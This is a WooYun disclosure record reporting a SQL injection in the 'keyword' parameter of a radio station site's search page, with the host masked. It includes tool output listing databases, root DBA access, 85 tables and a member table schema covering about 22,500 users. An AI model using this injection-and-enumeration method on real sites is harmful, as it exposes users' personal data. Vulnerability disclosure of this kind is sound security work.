乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-30: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
RT
主站地址:
http://**.**.**.**/
在线收听:
http://**.**.**.**/live_goodnews_new.htm
听着感觉志玲姐姐在说话。。。好柔软。。。漏洞地址:
http://**.**.**.**/search.phpPOST:keyword=1&submit=%E9%80%81%E5%87%BA参数:keyword
工具跑
5个库:
available databases [5]:[*] choir[*] goodnews[*] information_schema[*] mysql[*] test
当前库信息:
current user: 'root@localhost'current database: 'goodnews'current user is DBA: True
85张表:
Database: goodnews[85 tables]+--------------------------+| admins || admins_log || areacode || banner || banner_type || broadcast || broadcast_log || common_label || content || content_group || content_group_hex || content_keyword || content_log_action || content_log_factory || content_log_library || content_log_message || content_log_music || content_log_musicnews || content_log_news || content_log_program || content_log_publish || content_log_song || content_log_story || content_log_website || content_top || content_type_action || content_type_common || content_type_factory || content_type_host || content_type_magazine || content_type_message || content_type_music || content_type_news || content_type_program || content_type_promotion || content_type_publish || content_type_story || content_type_website || epaper || epaper_order || epaper_queue || epaper_type || faqs || faqs_type || forum || forum_group || forum_group_type || forum_post || forum_post_type || forum_reply || forum_vote || host || host_log || library_member || library_member_log || library_music || library_music_borrow || library_music_borrow_log || library_music_expand_log || library_music_log || library_music_song || library_music_type || live || marquee || marquee_log || marquee_type || member || member_country || member_education || member_identity || member_interest || member_log || member_notice || member_question || member_religion || member_response || member_type || menu_group || repost_type || security_images || website || website_counter || website_log_ccm || website_log_classic || website_type |+--------------------------+
22516条用户数据:
member表75个字段
Database: goodnewsTable: member[75 columns]+--------------------------------+--------------+| Column | Type |+--------------------------------+--------------+| id | int(10) || member_account | varchar(25) || member_action_notice | int(5) || member_address | varchar(250) || member_admin | varchar(120) || member_admin_update | datetime || member_answer | varchar(120) || member_areacode | varchar(25) || member_birthday | varchar(25) || member_birthday_month | varchar(5) || member_counter | int(10) || member_country | int(5) || member_education | int(5) || member_email | varchar(120) || member_emailchk | int(1) || member_epaper | int(1) || member_fax | varchar(120) || member_flag | int(5) || member_id | varchar(120) || member_identity | int(5) || member_interest | int(5) || member_level | varchar(25) || member_manage_title | varchar(120) || member_memo | text || member_mobeil | varchar(120) || member_mobeil_country_areacode | varchar(120) || member_nickname | varchar(120) || member_note | text || member_order_counter | int(10) || member_order_update | datetime || member_password | varchar(25) || member_pincode | varchar(25) || member_publish_order_magazine | int(5) || member_publish_order_paper | int(5) || member_question | varchar(25) || member_reg_date | datetime || member_reg_ip | varchar(120) || member_religion | int(5) || member_report_01 | int(5) || member_send_address | varchar(250) || member_send_areacode | varchar(25) || member_sex | int(1) || member_sign | varchar(250) || member_status | int(1) || member_tel | varchar(120) || member_tel_areacode | varchar(120) || member_tel_country_areacode | varchar(120) || member_title | varchar(120) || member_type_01 | int(5) || member_type_02 | int(5) || member_type_03 | int(5) || member_type_04 | int(5) || member_type_05 | int(5) || member_type_06 | int(5) || member_type_07 | int(5) || member_type_08 | int(5) || member_type_09 | int(5) || member_type_10 | int(5) || member_type_11 | int(5) || member_type_12 | int(5) || member_type_13 | int(5) || member_type_14 | int(5) || member_type_kind | int(10) || member_unit | varchar(250) || member_unit_ext | varchar(25) || member_unit_no | varchar(120) || member_unit_no_title | varchar(120) || member_unit_tel | varchar(120) || member_update | datetime || members_birthday_month | varchar(5) || members_equip | varchar(200) || members_face | varchar(100) || members_face_height | int(4) || members_face_width | int(4) || members_useravatar | varchar(10) |+--------------------------------+--------------+
dump几条数据做证明
整理一下:
DBA可跨库
已证明
过滤
危害等级:高
漏洞Rank:17
确认时间:2015-12-31 03:34
感謝通報
暂无